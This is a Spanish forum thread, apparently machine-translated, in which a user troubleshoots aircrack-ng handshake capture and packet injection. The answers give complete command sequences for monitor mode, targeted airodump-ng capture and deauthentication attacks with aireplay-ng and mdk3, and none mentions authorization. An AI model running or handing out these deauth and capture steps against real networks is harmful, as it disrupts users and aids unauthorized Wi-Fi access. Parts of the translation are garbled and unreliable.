Algunas preguntas acerca de aircrack-ng

1

Hola, recientemente empecé a jugar con aircrack-ng y tengo algunas preguntas.

  1. Cuando estoy empezando con todo el proceso, en lugar de activar el modo de monitor, hago lo opuesto a airmon-ng stop wlan0 y escucho con airodump-ng wlan0 . Hago esto porque cuando escucho usando airodump-ng mon0 (después de i airmon-ng start wlan0 por supuesto) no puedo obtener un saludo, y con wlan0 puedo. ¿Es esto normal o me estoy perdiendo algo?
  2. Leí en su sitio web que hay algunas tarjetas inalámbricas que solo pueden escuchar paquetes y no pueden inyectarlos. Parece que no puedo engañar a un usuario en alguna red, así que me pregunto si es un problema con mi tarjeta o si estoy haciendo algo mal. Intenté embellecer de varias maneras diferentes:
    • aireplay-ng -0 0 -a *BSSID* wlan0
    • aireplay-ng -0 0 -a *BSSID* -c *DMAC* wlan0
    • mdk3 wlan0 b -n *DMAC*

También cuando ejecuto aireplay-ng -9 wlan0 obtengo 0/30 paquetes exitosos inyectados en cada AP.

Parece que no puedo determinar si mi tarjeta es capaz de inyectar paquetes. El comando lspci -nn | grep 0280 me da 02: 00.0 Controlador de red [0280]: Intel Corporation Wireless 3160 [8086: 08b4] (rev 93)

    
pregunta b0ne 22.06.2016 - 00:27
fuente

3 respuestas

1

Muy bien amigo, aquí hay algunas notas:

En cuanto al problema del protocolo de enlace, por experiencia, podría ser lo siguiente:

  • No está lo suficientemente cerca del enrutador, existe la posibilidad de que no capture el protocolo de enlace si el cliente está demasiado cerca del punto de acceso y el dispositivo en modo monitor está relativamente lejos.
  • Un problema de hardware, su dispositivo de red es antiguo y no es compatible, por lo que no puede capturar paquetes de otros protocolos. Por ejemplo, si su dispositivo ejecuta 802.11g y la red es 802.11n

Solución: primero, intente capturar el saludo desde diferentes posiciones físicas; si no funciona, pruebe con otro dispositivo WiFi.

Nota:

Algunas respuestas dicen kill procesos que interfieren con airmon-ng. No utilice el comando
airmon-ng check kill porque detendrá la aplicación del administrador de red.

No use el comando anterior para corregir el error del canal fijo -1, en su lugar, use los siguientes comandos cuando inicie el modo monitor:

  • airmon-ng start wlan0
  • ifconfig wlan0mon down
  • iwconfig wlan0mon mode monitor
  • ifconfig wlan0mon up
respondido por el Emadeddin 21.08.2016 - 09:47
fuente
0

Asegúrese de que está ejecutando airmon-ng check kill antes de cambiar al modo de monitoreo para finalizar cualquier proceso que pueda interferir con el monitoreo. También en tus intentos de belleza, prueba:

  

aireplay-ng -0 25 -a {BSSID} -c {ClientMAC} {interface}

Este tutorial tiene una explicación bastante buena de cómo para realizar el ataque que estás buscando.

Consulte this para ver si su tarjeta es compatible con aireplay-ng.

    
respondido por el HashHazard 22.06.2016 - 03:33
fuente
0

Tengo un método simple para hacer lo que estás intentando. En lugar de usar aireplay-ng y airmon-ng, lo siguiente eliminará los problemas iniciales (o debería).

1.) iw
2.) mdk3

Aunque veo que mencionaste mdk3, el ataque de Deauth debería funcionar con el siguiente método mío.

Comandos:

ifconfig wlan0 down

... y luego,

iw wlan0 interface add mon0 type monitor

... y luego,

# Just to make sure mon0 is up.
ifconfig mon0 up

... y luego,

airodump-ng mon0

... encuentre el punto de acceso que desea ver y luego,

# Stop airodump-ng
crtl + c

# start airodump-ng on target AP.
airodump-ng mon0 --bssid (MAC here) --channel (AP channel here) --write /path/to/capfiles.pcap

... una vez que airodump-ng se esté ejecutando y capturando en el AP objetivo, luego ejecútelo,

# Deauth attack.
mdk3 mon0 d -s 100 -c (AP channel here)

Para el ataque Deauth, también puede incluir una lista blanca / negra de AP que desea ignorar. Necesitará tener dos terminales para este método simple. Solo debe esperar un poco antes de que los clientes conectados a la AP se descarguen. Sin embargo, ten en cuenta que si no hay dispositivos conectados en el AP, no podrás capturar ningún saludo. Los apretones de manos se hacen cuando un dispositivo se autentica en el AP.

Cuando tenga el protocolo de enlace, presione crtl + c para detener mdk3 y airodump-ng. El archivo de la tapa se guardará en el directorio que especificó en la opción "escribir" de airodump-ng.

Para eliminar la interfaz mon0, ejecute el siguiente comando:

# Remove mon0
iw mon0 del

Y ya has terminado.

Si todavía tienes problemas, no dudes en contactarme en Facebook: Yokai Seishinkage.

(editar) Tenga en cuenta que esto elimina completamente la dependencia del uso de airmon-ng que también elimina los conflictos de servicio. Pero todavía será mejor usar este método con wlan0 hacia abajo para evitar cualquier problema. Hasta ahora, funciona perfectamente para mí.

    
respondido por el Yokai 21.08.2016 - 11:22
fuente

Lea otras preguntas en las etiquetas